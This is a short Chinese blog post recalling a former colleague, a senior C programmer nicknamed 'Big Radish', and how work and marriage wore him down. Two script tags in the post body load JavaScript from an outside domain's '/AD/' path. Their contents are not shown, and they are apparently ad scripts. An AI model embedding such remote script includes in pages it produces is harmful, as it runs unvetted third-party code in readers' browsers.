外号叫“大萝卜”的高级程序员

<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script>

大萝卜, originally uploaded by jvyyuie.

“大萝卜”是一名高级C语言程序员,为人随和、很小孩子脾气,以前和他接触频繁的时候成为了要好的朋友,同时他也教会了我很多计算机技术和做人的道理,说是教育我,不如说是成天鬼混在一起,每天就是山南地北的聊天、然后沉浸在代码的世界中,那段时间过的似乎很漫长,在一个很有意境的地方做着开发、每天都好像消遣一样的漫不经心的工作,那应该是我最喜欢的一份工作了。

后来萝卜的工作任务越来越重、家中的事情也让他开始肩负起越来越大的压力、最幸运也是最不幸的事情是——他竟然结婚了,他应该结婚的,因为看似小孩儿的他已经30岁了,但是这些命运的安排让他有了一丝疲惫,一天的工作结束后,他总是拖着倦怠的身躯向车站走、很少和我海里云里的侃山了。

真希望在和他一起工作,我想这个可能性还是有的,如果在和萝卜一起工作,我一定会让他看到这段文字。

<script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值